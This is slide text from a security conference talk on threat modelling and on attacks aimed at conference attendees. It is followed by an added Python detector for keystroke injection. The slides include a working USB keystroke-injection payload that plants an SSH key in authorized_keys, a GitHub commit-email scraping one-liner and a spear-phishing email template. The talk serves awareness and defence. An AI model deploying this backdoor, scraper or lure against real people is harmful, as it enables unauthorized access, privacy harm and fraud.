15. Ignoring part of your system
when considering security is
a common mistake
Gareth Rushgrove
16.
the attack surface of a software environment
is the sum of the different points (the "attack
vectors") where an unauthorized user (the
"attacker") can try to enter data to or extract
data from an environment.
ATTACK SURFACE
24.
an entity which facilitates interactions
between two parties who both trust
the third party
TRUSTED THIRD PARTY
25.
a term in computer science and security used
to describe a boundary where program data or
execution changes its level of "trust". The
term refers to any distinct boundary within
which a system trusts all sub-systems
(including data).
TRUST BOUNDARY
51. Let’s assume your applications and
infrastructure are super secure*
* This probably isn’t true. You should worry about that as well.
63.
[Wi-Fi menu showing the networks in range: More Internet, Some Internet, Marks iPhone, FREE CONFERENCE WIFI, Hacked Android, CONFERENCE VENUE, Private, Software Circus, Company next door, Coffee shop downstairs, Software Circus II, Docker Corp, Avengers Tower, FON, My Blackberry, Nokia4ever, ABANK]
64.
This is the official
conference wifi right?
65.
Or is it this one?
Whatever, both work
66. Devices exist to man-in-the-middle
wireless networks
67. Who has ever picked up a USB
memory stick at a conference?
69. USB devices exist which will run a
script on connect (normally by
impersonating a keyboard)
70. (without introducing more risk)
DELAY 1000
COMMAND SPACE
DELAY 500
STRING Terminal
DELAY 500
ENTER
DELAY 800
STRING echo 'RSA_PUB_ID' >> ~/.ssh/authorized_keys
ENTER
DELAY 1000
STRING killall Terminal
ENTER
Add my public key
https://github.com/hak5darren/USB-Rubber-Ducky/wiki/Payload---OSX-Passwordless-SSH-access-%28ssh-keys%29
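One way a defender can spot the keyboard-impersonating device described above: injected keystrokes arrive at a fixed, machine-speed cadence that human typing never matches. This is an added example, not code from the talk; the event log, the timing thresholds and the function names are constructed assumptions.

```python
"""Flag keystroke bursts whose inter-key timing is too fast and too regular
to be human, the signature of a USB device impersonating a keyboard."""
from statistics import pstdev

# Constructed sample: (timestamp_ms, key) events from a keystroke logger.
# The first run mimics a person typing "ls -la"; the second mimics a device
# injecting the authorized_keys line from the payload above at 8 ms per key.
HUMAN = [(0, "l"), (142, "s"), (310, " "), (455, "-"), (601, "l"), (733, "a"), (1200, "\n")]
INJECTED_TEXT = "echo 'RSA_PUB_ID' >> ~/.ssh/authorized_keys\n"
INJECTED = [(5000 + 8 * i, ch) for i, ch in enumerate(INJECTED_TEXT)]
SAMPLE_EVENTS = HUMAN + INJECTED


def find_injection_bursts(events, max_interval_ms=20, min_keys=12, max_jitter_ms=3):
    """Return (start_ms, end_ms, text) for every run of at least ``min_keys``
    keystrokes in which every gap is <= max_interval_ms and the gaps barely
    vary. The thresholds are assumptions; tune them on real keyboard telemetry."""
    bursts = []
    run = [events[0]] if events else []
    for prev, cur in zip(events, events[1:]):
        if cur[0] - prev[0] <= max_interval_ms:
            run.append(cur)          # still inside a fast run
        else:
            _flush(run, bursts, min_keys, max_jitter_ms)
            run = [cur]              # a human-length pause ends the run
    _flush(run, bursts, min_keys, max_jitter_ms)
    return bursts


def _flush(run, bursts, min_keys, max_jitter_ms):
    """Record the run if it is long enough and its timing is script-like."""
    if len(run) < min_keys:
        return
    gaps = [b[0] - a[0] for a, b in zip(run, run[1:])]
    # Even a fast typist shows tens of ms of jitter between keys; a script does not.
    if pstdev(gaps) <= max_jitter_ms:
        bursts.append((run[0][0], run[-1][0], "".join(k for _, k in run)))


if __name__ == "__main__":
    for start, end, text in find_injection_bursts(SAMPLE_EVENTS):
        print(f"suspected keystroke injection {start}-{end} ms: {text!r}")
```

On the constructed sample only the injected run is reported; the human-typed command produces no alert.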
72. Lots of people here are on Twitter
and using the conference hashtag
73. Lots of people here are on GitHub
with the same username
74. (without introducing more risk)
$ curl -s https://api.github.com/users/<username>/events/public \
  | jq '.[].payload.commits[0].author.email' \
  | sort \
  | uniq \
  | grep -v "null"
Email from GitHub user
75. an e-mail spoofing fraud attempt that targets
a specific organization or individual, seeking
unauthorized access to confidential data.
SPEAR PHISHING
76. Hi <your name>
Great to see you at <conference name here> last
week.
I thought you’d be interested in the container testing
tool I mentioned. http://nothingevilhere.com. Would
love to know what you think.
Hopefully see you at DockerCon next year too.
77. (without introducing more risk)
So you’re saying
we’re all doomed?
This is quite depressing now I think about it
78. Part of threat modeling is coming
up with suitable mitigations to the
risks identified
79. - 2 factor authentication
- Time-limited credentials
- Separation of duties
- Two person rule
- Configuration management
80. having more than one person required to
complete a task. In business, splitting a single
task between more than one individual is an
internal control intended to prevent fraud
and error.
SEPARATION OF DUTIES
81. a control mechanism designed to achieve a
high level of security for especially critical
material or operations. Under this rule all
access and actions require the presence of
two authorized people at all times.
TWO-PERSON RULE
82.
a process that identifies critical information to
determine if friendly actions can be observed
by enemy intelligence and determines if
information obtained by adversaries could be
interpreted to be useful to them.
OPERATIONAL SECURITY (OPSEC)
83. Once you understand the threat
you can seek out specific guidance
84.
85. - Protect data in transit
- Protect data at rest
- Authentication
- Secure boot
- Platform integrity and sandboxing
- Application whitelisting
- Malicious code detection
- Security policy enforcement
- External interface protection
- Device update policy
- Event collection and analysis
- Incident response
https://www.cesg.gov.uk/guidance/end-user-devices-security-principles